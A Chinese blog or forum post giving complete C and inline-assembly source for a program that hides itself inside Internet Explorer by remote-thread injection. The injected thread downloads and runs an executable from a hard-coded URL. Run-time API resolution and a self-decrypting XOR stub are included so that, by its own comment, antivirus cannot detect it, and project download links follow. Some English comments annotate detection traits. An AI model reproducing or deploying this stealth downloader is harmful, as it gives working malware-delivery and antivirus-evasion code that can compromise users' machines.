一、 打开半年前的一个工程,是利用IE来隐藏进程下载的实例,我想灰鸽子也是类似原理吧!
下面是程序的主要思路:
1.获取程序自身路径,启动IE进程
2.获取到IE进程句柄
3.分配内存
4.获取进程映像的地址
5.得到内存镜像大小
6.确定起始基址和内存映像基址的位置
7.写内存,创建线程,写数据
8.建立远程线程并运行,关闭对象
二、下面是源码,仅以下载迅雷为例:
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
//取消这4行的注释,可编译出2K大的文件
//#pragma comment(linker,"/OPT:NOWIN98")
//#pragma comment(linker,"/merge:.data=.text")
//#pragma comment(linker,"/merge:.rdata=.text")
//#pragma comment(linker,"/align:0x200")
#pragma comment(linker,"/ENTRY:decrpt")
#pragma comment(linker,"/subsystem:windows")
#pragma comment(linker,"/BASE:0x13150000")
//动态加载shell32.dll中的ShellExecuteA函数
// Function-pointer globals that are resolved by name with GetProcAddress at run time
// instead of being imported statically. As a result the binary carries no import-table
// entries for the download / launch / remote-thread APIs; the names only exist as
// strings inside download() and main(), which is worth knowing when triaging a sample.
// Prototype matching shell32!ShellExecuteA.
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,int);
// Prototype matching the urlmon download-to-file routine looked up in download().
DWORD (WINAPI *DOWNFILE)(LPCTSTR,LPCTSTR,LPCTSTR,DWORD,LPCTSTR);
// Prototype matching kernel32!CreateRemoteThread; main() calls it to start the remote thread.
HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
// Real program entry point, selected by the /ENTRY:decrpt linker directive above.
void decrpt();
// Process handle passed to VirtualAllocEx / WriteProcessMemory / CreateRemoteThread in main().
HANDLE processhandle;
// Process id filled in by GetWindowThreadProcessId in main().
DWORD pid;
HINSTANCE hshell,hurlmon,hkernel;// HINSTANCE and HMODULE are interchangeable here
// 注入使用的下载函数
// Payload routine. main() hands its address to the remote thread it creates, so this
// code is meant to run inside the target process, not in this one. Its byte span
// (download .. decrpt) is also what decrpt() XOR-decodes in place, so the layout of
// this function is part of the program's behaviour.
// From a detection standpoint this is the observable part: a network fetch, a file
// written to a fixed path on the system drive, and a new process started from a
// host (IE) that normally has no reason to do so.
void download()
{
// APIs resolved by name at run time; nothing here shows up in the import table.
hshell = LoadLibrary("Shell32.dll");
hurlmon = LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN = GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE = GetProcAddress(hurlmon,"UrlDownloadToFileA");
// URL and destination path are hard-coded (original comment: "adjust the file to download yourself").
DOWNFILE(NULL,"http://down.sandai.net/Thunder5.9.5.990.exe","C://xunlei.exe",0,NULL);
// Open (execute) the downloaded file via the shell.
SHELLRUN(0,"open","C://xunlei.exe",NULL,NULL,5);
// Terminates whichever process this code is running in — i.e. the host — once the
// download has been launched.
ExitProcess(0);
}
// Injection driver (called from decrpt() under SEH, not the real entry point).
// Launches IE, finds its process, copies this module's whole image into that process
// at the same base address, and starts a thread there at download().
// VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread is the classic remote-
// thread injection sequence that endpoint monitoring keys on; the PAGE_EXECUTE_READWRITE
// allocation in a foreign process and the freshly spawned IEXPLORE.EXE child are the
// other artifacts to look for. `void main` is non-standard C++ (MSVC accepts it).
void main()
{
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
// 1. Build the IE path and launch it. Only the first three characters of the Windows
//    directory (drive, colon, separator) are reused; the remainder is a fixed literal.
//    NOTE(review): the literal itself starts with "C://", so as printed the result is not
//    a clean path — presumably the forum rendering mangled backslashes into "//".
GetWindowsDirectory(iepath,MAX_PATH);
strncpy(iename,iepath,3);
strcat(iename,"C://Program Files//Internet Explorer//IEXPLORE.EXE");
WinExec(iename,SW_SHOWNORMAL);
// Fixed delay for the IE window to come up; nothing verifies that it did.
Sleep(500);
// 2. Locate IE's top-level window and read the id of the process that owns it.
HWND htemp;
htemp = FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
// 3. Locals for the copy of this module's image.
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
// 4. Base address of this executable's own in-memory image.
Module = GetModuleHandle(NULL);
// 5. Read the image size straight from the PE headers: [base+0x3c] is e_lfanew and
//    [NT headers+0x50] is OptionalHeader.SizeOfImage for a PE32 image. eax/ebx are
//    saved and restored around the reads.
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
// Reserve the same address range in the target process as this image occupies here,
// so absolute addresses inside the copied code (including the download() address used
// below) stay valid; the fixed /BASE: linker directive above presumably exists for this.
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// 6. Copy the entire image over, then take the local address of download() as the
//    remote thread's start routine (valid in the target only because the base matches).
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);
LPTHREAD_START_ROUTINE entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
// CreateRemoteThread is resolved by name too rather than imported.
hkernel=LoadLibrary("KERNEL32.dll");
(FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); // create the remote thread and run it
// 7. Release the process handle.
CloseHandle(processhandle);
return;
} ;
// 解密函数
// Real entry point (/ENTRY:decrpt). A self-decoding stub: the bytes in [download, decrpt)
// — in source order that is download() and main(), though final placement is up to the
// linker — are treated as XOR-encoded with an unknown single-byte key. Every key from 1
// to 0xFF is tried in turn by decoding into place and calling main() under an SEH
// handler that swallows the fault a wrong key most likely produces.
// For analysts the telling traits are VirtualProtectEx making the process's own code
// page writable+executable, the self-modifying write loop, and the SEH brute-force loop.
void decrpt()
{
HANDLE myps;
DWORD oldAttr;
BYTE shellcode[500];
ZeroMemory(shellcode,sizeof(shellcode));
myps=GetCurrentProcess();
// Make 0x1000 bytes starting at download writable so decoded bytes can be stored back.
::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
// Save the original encoded bytes into shellcode; ecx = decrpt - download is the count.
// The count is never compared with the 500-byte buffer, so the copy relies on layout.
_asm
{
pushad;
lea esi,download;
lea edi,shellcode;
lea ecx,decrpt;
sub ecx,esi;
en1:
lodsb;
stosb;
dec ecx;
jne en1;
popad;
};
// Candidate-key loop: each pass re-decodes from the saved copy back over download
// using key i (xor al,bl with bl = low byte of i).
int i;
for (i=1;i<=0xFF;i++)
{
_asm
{
pushad;
lea esi,shellcode;
lea edi,download;
lea ecx,decrpt;
sub ecx,edi;
en2:
lodsb;
mov ebx,i;
xor al,bl;
stosb;
dec ecx;
jne en2;
popad;
};
// Original comment: this construct exists so that ordinary antivirus software cannot
// detect the program as a virus. With the right key main() runs and returns here;
// with a wrong key the garbage code faults and the empty __except block simply moves
// on to the next candidate.
__try
{
main();
return;
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
};
}
return;
}
三、工程及源码下载地址:
http://download.csdn.net/source/1546155
http://www.rayfile.com/files/77ea8ad9-80ff-11de-aeb2-0014221b798a/